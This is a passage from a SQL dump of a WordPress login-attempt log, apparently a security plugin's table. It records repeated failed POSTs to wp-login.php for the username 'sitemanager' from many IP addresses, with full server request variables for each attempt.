Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46200\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746022169.1547649;s:12:\"REQUEST_TIME\";i:1746022169;}}','195.7.5.237',0,'2025-04-30 19:39:31','1970-01-01 00:00:00'),(94561,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58966\";s:11:\"REMOTE_ADDR\";s:11:\"123.1.133.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746022558.895426;s:12:\"REQUEST_TIME\";i:1746022558;}}','123.1.133.4',0,'2025-04-30 19:46:00','1970-01-01 00:00:00'),(94562,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38432\";s:11:\"REMOTE_ADDR\";s:13:\"185.252.31.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746022946.4546721;s:12:\"REQUEST_TIME\";i:1746022946;}}','185.252.31.27',0,'2025-04-30 19:52:28','1970-01-01 00:00:00'),(94563,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34776\";s:11:\"REMOTE_ADDR\";s:14:\"194.195.113.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746023338.4929869;s:12:\"REQUEST_TIME\";i:1746023338;}}','194.195.113.17',0,'2025-04-30 19:59:00','1970-01-01 00:00:00'),(94564,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60228\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746023724.3801119;s:12:\"REQUEST_TIME\";i:1746023724;}}','198.54.114.29',0,'2025-04-30 20:05:26','1970-01-01 00:00:00'),(94565,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39948\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.207.168\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746024117.7385969;s:12:\"REQUEST_TIME\";i:1746024117;}}','199.188.207.168',0,'2025-04-30 20:11:59','1970-01-01 00:00:00'),(94566,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33506\";s:11:\"REMOTE_ADDR\";s:15:\"103.234.209.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746024504.3963101;s:12:\"REQUEST_TIME\";i:1746024504;}}','103.234.209.234',0,'2025-04-30 20:18:26','1970-01-01 00:00:00'),(94567,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38770\";s:11:\"REMOTE_ADDR\";s:12:\"106.75.190.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746024893.918066;s:12:\"REQUEST_TIME\";i:1746024893;}}','106.75.190.3',0,'2025-04-30 20:24:55','1970-01-01 00:00:00'),(94568,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42392\";s:11:\"REMOTE_ADDR\";s:12:\"185.79.157.9\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746025266.4213619;s:12:\"REQUEST_TIME\";i:1746025266;}}','185.79.157.9',0,'2025-04-30 20:31:08','1970-01-01 00:00:00'),(94569,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54820\";s:11:\"REMOTE_ADDR\";s:11:\"45.67.14.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746025644.106236;s:12:\"REQUEST_TIME\";i:1746025644;}}','45.67.14.64',0,'2025-04-30 20:37:25','1970-01-01 00:00:00'),(94570,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56440\";s:11:\"REMOTE_ADDR\";s:13:\"187.33.241.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746026026.6476929;s:12:\"REQUEST_TIME\";i:1746026026;}}','187.33.241.37',0,'2025-04-30 20:43:48','1970-01-01 